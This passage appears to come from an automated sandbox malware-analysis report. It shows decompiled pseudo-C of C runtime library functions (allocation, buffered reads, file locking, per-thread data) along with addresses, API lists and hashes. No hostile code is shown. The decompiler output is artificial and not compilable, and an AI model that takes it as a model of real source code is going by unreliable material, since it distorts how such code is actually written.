							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2d41648
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2d41648
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2d41648
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02D41648), ref: 00414050

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
